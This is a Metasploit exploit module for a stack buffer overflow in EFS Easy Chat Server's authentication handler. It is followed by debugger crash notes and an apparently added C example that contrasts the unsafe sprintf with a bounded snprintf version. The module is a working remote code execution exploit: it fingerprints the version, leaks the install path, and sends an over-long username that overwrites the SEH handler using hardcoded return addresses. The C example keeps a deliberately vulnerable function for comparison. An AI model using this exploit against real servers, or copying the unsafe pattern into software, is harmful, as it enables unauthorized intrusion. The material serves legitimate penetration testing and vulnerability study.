GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/http/efs_easychatserver_username.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  HttpFingerprint = { :pattern => [ /Easy Chat Server\/1\.0/ ] }

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'EFS Easy Chat Server Authentication Request Handling Buffer Overflow',
      'Description' => %q{
        This module exploits a stack buffer overflow in EFS Software Easy Chat
        Server versions 2.0 to 3.1. By sending an overly long authentication
        request, an attacker may be able to execute arbitrary code.
      },
      'Author' =>
        [
          'LSO <lso[at]hushmail.com>', # original metasploit
          'bcoles' # metasploit
        ],
      'License' => BSD_LICENSE,
      'References' =>
        [
          [ 'CVE', '2004-2466' ],
          [ 'OSVDB', '7416' ],
          [ 'OSVDB', '106841' ],
          [ 'BID', '25328' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Privileged' => false,
      'Payload' =>
        {
          'Space' => 7000,
          'BadChars' => "\x00\x0a\x0b\x0d\x0f\x20\x25\x26",
          'StackAdjustment' => -3500,
        },
      'Platform' => 'win',
      'Targets' =>
        [
          # Tested on Easy Chat Server v2.0, 2.1, 2.2, 2.5, 3.1 on:
          # -- Windows XP SP 3 (x86) (EN)
          # -- Windows 7 SP 1 (x64) (EN)
          # -- Windows 8 SP 0 (x64) (EN)
          [ 'Automatic Targeting', { 'auto' => true } ],
          # p/p/r SSLEAY32.dll
          [ 'Easy Chat Server 2.0', { 'Ret' => 0x10010E2E } ],
          # p/p/r SSLEAY32.dll
          [ 'Easy Chat Server 2.1 - 3.1', { 'Ret' => 0x1001071E } ]
        ],
      'DisclosureDate' => '2007-08-14',
      'DefaultTarget' => 0))
  end

  def check
    version = get_version
    if not version
      return Exploit::CheckCode::Safe
    end
    vprint_status "Found version: #{version}"
    if version !~ /^(2\.\d|3\.0|3\.1)$/
      return Exploit::CheckCode::Safe
    end
    path = get_install_path
    if not path
      return Exploit::CheckCode::Detected
    end
    vprint_status "Found path: #{path}"
    return Exploit::CheckCode::Appears
  end

  #
  # Get software version from change log
  #
  def get_version
    res = send_request_raw 'uri' => '/whatsnew.txt'
    if res and res.body =~ /What's new in Easy Chat Server V(\d\.\d)/
      return "#{$1}"
    end
  end

  #
  # Get software installation path from uninstall file
  #
  def get_install_path
    res = send_request_raw 'uri' => '/unins000.dat'
    if res and res.body =~ /([A-Z]:\\[^\x00]{2,256})?\\[a-z]+\.htm/i
      return "#{$1}"
    end
  end

  def exploit

    # get target
    if target.name =~ /Automatic/
      version = get_version
      vprint_status "Found version: #{version}" if version
      if not version or version !~ /^(2\.\d|3\.0|3\.1)$/
        fail_with(Failure::NoTarget, "#{peer} - Unable to automatically detect a target")
      elsif version =~ /(2\.0)/
        my_target = targets[1]
      elsif version =~ /(2\.\d|3\.0|3\.1)/
        my_target = targets[2]
      end
    else
      my_target = target
    end

    # get install path
    path = get_install_path
    if not path
      fail_with(Failure::UnexpectedReply, "#{peer} - Could not retrieve install path")
    end
    path << "\\users\\"
    vprint_status "Using path: #{path}"

    # send payload
    sploit = rand_text_alpha(256 - path.length)
    sploit << generate_seh_payload(my_target.ret)
    print_status "Sending request (#{sploit.length} bytes) to target (#{my_target.name})"
    send_request_cgi({
      'uri' => '/chat.ghp',
      'encode_params' => false,
      'vars_get' => {
        'username' => sploit,
        'password' => rand_text_alphanumeric(rand(10) + 1),
        'room' => 1,
        'sex' => rand_text_numeric(1)
      }
    }, 5)

  end
end

=begin

0x004144C8 calls sprintf with the following arguments:
sprintf(&FileName, "%susers\\%s", path, username);

Since we can make the username larger than the allocated buffer size
we end up overwriting SEH with a PPR from SSLEAY32.dll and nSEH with
a short jmp to the beginning of our shellcode.

(46c.144): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=ffffffff ebx=000007f6 ecx=0047fd50 edx=41414141 esi=000007ef edi=0047a3ea
eip=00445f34 esp=01216b88 ebp=01216ba0 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
EasyChat+0x45f34:
00445f34 8a02 mov al,byte ptr [edx] ds:0023:41414141=??

0:005> !exchain
01216dd8: 41414141
Invalid exception stack at 41414141
=end
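The root cause in the notes above is an unbounded sprintf of the request's username into a fixed-size FileName buffer. The following C is an added example, not code from the module or from Easy Chat Server: it shows that pattern next to a bounded replacement that refuses over-long input instead of writing past the buffer. The buffer size (FILENAME_CAP), the install path and the usernames are constructed for the illustration; the real buffer size is not stated on the page.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Assumed buffer size for this illustration only. */
#define FILENAME_CAP 256

/* The pattern the module's notes describe: sprintf into a fixed buffer with a
 * caller-controlled username. Kept for comparison and never called here,
 * because an over-long username makes it write past the end of file_name. */
void build_user_file_unsafe(char *file_name, const char *path, const char *username)
{
    sprintf(file_name, "%susers\\%s", path, username);
}

/* Bytes the formatted result needs, terminator included. Useful as a
 * pre-check or for logging rejected requests. */
size_t user_file_required(const char *path, const char *username)
{
    return strlen(path) + strlen("users\\") + strlen(username) + 1;
}

/* Hardened form: snprintf bounds the write and its return value reveals
 * truncation, which is treated as an error rather than used as a clipped
 * path. Returns true on success, false (with an empty buffer) otherwise. */
bool build_user_file_safe(char *file_name, size_t cap, const char *path, const char *username)
{
    int n = snprintf(file_name, cap, "%susers\\%s", path, username);
    if (n < 0 || (size_t)n >= cap) {
        if (cap > 0) file_name[0] = '\0';
        return false;
    }
    return true;
}

/* Constructed demo: a plausible install path, a normal username, and a
 * 300-byte username that the hardened version rejects. */
int main(void)
{
    char file_name[FILENAME_CAP];
    const char *path = "C:\\Program Files\\Easy Chat Server\\";
    char long_user[301];
    memset(long_user, 'A', 300);
    long_user[300] = '\0';

    printf("short user accepted: %d (%s)\n",
           build_user_file_safe(file_name, sizeof file_name, path, "alice"), file_name);
    printf("long user accepted:  %d (needs %zu bytes)\n",
           build_user_file_safe(file_name, sizeof file_name, path, long_user),
           user_file_required(path, long_user));
    return 0;
}
```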